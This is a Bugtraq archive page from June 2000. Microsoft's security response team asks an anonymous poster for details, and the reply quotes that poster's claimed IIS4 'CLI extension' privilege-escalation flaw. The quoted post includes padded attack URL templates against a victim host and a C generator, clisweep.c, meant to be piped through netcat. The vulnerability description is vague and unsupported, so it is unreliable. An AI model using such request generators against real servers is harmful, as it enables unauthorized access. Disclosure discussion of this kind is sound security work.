Bugtraq mailing list archives
Re: Shinex vs. IIS CLI Extensions
From: secure () MICROSOFT COM (Microsoft Security Response Center)
Date: Thu, 8 Jun 2000 20:17:15 -0700
-----BEGIN PGP SIGNED MESSAGE----- We'd be very interested in investigating this report, but unfortunately we can't contact the author because of the anonymous remailer. If the author would contact us at secure () microsoft com, we'd very much to get some additional information. Regards, Secure () microsoft com - -----Original Message----- From: dev-null () NO-ID COM [mailto:dev-null () NO-ID COM] Sent: Monday, June 05, 2000 5:32 AM To: BUGTRAQ () SECURITYFOCUS COM Subject: Shinex vs. IIS CLI Extensions [ This message has been sent anonymously due to configuration problems I'm experiencing with my mail server. If you would like to discuss the finepoints of this post, you're quite welcome to message me on Efnet (nickname: shinex). ] While doing a security audit on a WinNT 4.0 system, I discovered an `object collision` vulnerability that can potentially lead to remote compromise. The flaw lies in the mechanism employed by CLI objects to handle dynamic pre-auth requests from a stateful client. States of operation are inherent in the implementation itself. This flaw could lead to a determined attacker gaining administrative privileges on servers using this widely deployed object kit. EXPLOITATION NOTES - ------------------ Request #1: http://www.victim.com/.....~518 chars.../[invocation of CLI object] Request #2: http://www.victim.com/.....~260 chars.../[request with req1 object as ext] Simple as that. It's important that both requests reach the target server within a timeframe of 15 seconds (a rough estimate). Your threshold may vary. Subsequent requests will be made with raised authorization levels. The rationale for the char padding will be available later in the followup post (see below). Microsoft has been notified and patching information should be forthcoming. While not as severe as the RDS vulnerability, it is still an avenue of attack that could provide a determined attacker with unauthorized access. (Allow me to mention in passing that the scarcity of detail in this paper is intentional. A more thorough assessment will be posted after Microsoft have released their hotfix.) HELPER CODE - ----------- /* ** clisweep.c by shinex (efnet) ** Quick generator for IIS4 CLI extension vuln URLs. ** ** $ (./clisweep <cli object> ; cat) | nc www.victim.com 80 ** OK. This code is buggy, because I mistakingly thought ** that both requests would be delivered without having ** to restart netcat. I can't code network apps. Sorry. ** */ #include <stdio.h> #include <string.h> #include <unistd.h> #define DOT1 518 #define DOT2 260 #define THRESHOLD 15 #define RANDFILE "AABBCC" char *gendots(int); char *calc(char *); int main(int argc, char *argv[]) { char req1[1024], req2[1024]; if(argc != 2) { fprintf(stderr, "Usage: %s <cli object>\n", *argv); return -1; } sprintf(req1, "GET /%s/%s", gendots(DOT1), argv[1]); sprintf(req2, "GET /%s/%s", gendots(DOT2), calc(argv[1])); #ifdef SCRIPTKIDPROTECTION printf("%s\n\n", req1); sleep(THRESHOLD); printf("%s\n\n", req2); #endif return 0; } char *gendots(int num) { int i; static char dots[1024]; char *ptr = dots; for(i = 0; i < num; i++) *ptr++ = '.'; return dots; } char *calc(char *arg) { static char file[1024]; char *ptr; ptr = strrchr(arg, '.'); *ptr = '\0'; /* no error checks */ sprintf(file, "%s.%s", RANDFILE, arg); return file; } SHOUTOUTS - --------- Greets to route and my other friends. - -- This message has been sent via an anonymous mail relay at www.no-id.com. -----BEGIN PGP SIGNATURE----- Version: PGP Personal Privacy 6.5.3 iQEVAwUBOUBhxo0ZSRQxA/UrAQGUEwgArWqKiGuSBSKz71ui5jFmRAf0nPRm6ez6 Ly1wVNRQLIuknJmz7eS5I6mQ7+UTgaMpT90fHRN6heU7T45xdsNAHwrJ9btNPEpW luW3q0fHMGaTEXAEm6pAvX5ORV7pWgvRV6NHBPFv5MTLNwd9xbC4mhJXpp7sdpkO h3XDNSuOcRmHTCcBL1Ikq8R/MgogKe/+AdTGTolAr9uvwTRTEa4SMolp98jUh813 jd54uiWU7M1tu5Wi3gsiDnIske+TzijLoyx4n8G0o01BKieiOvrYbQVvUb92DTPu EvetLz1Gavj41M9fCP2zmdUSJInRtPXhgF4DMaiL5h1Bu0zg/T8KRg== =QG1C -----END PGP SIGNATURE----- <HR NOSHADE> <UL> <LI>application/x-pkcs7-signature attachment: smime.p7s </UL>
Current thread:
- Shinex vs. IIS CLI Extensions dev-null () NO-ID COM (Jun 05)
- <Possible follow-ups>
- Re: Shinex vs. IIS CLI Extensions Microsoft Security Response Center (Jun 08)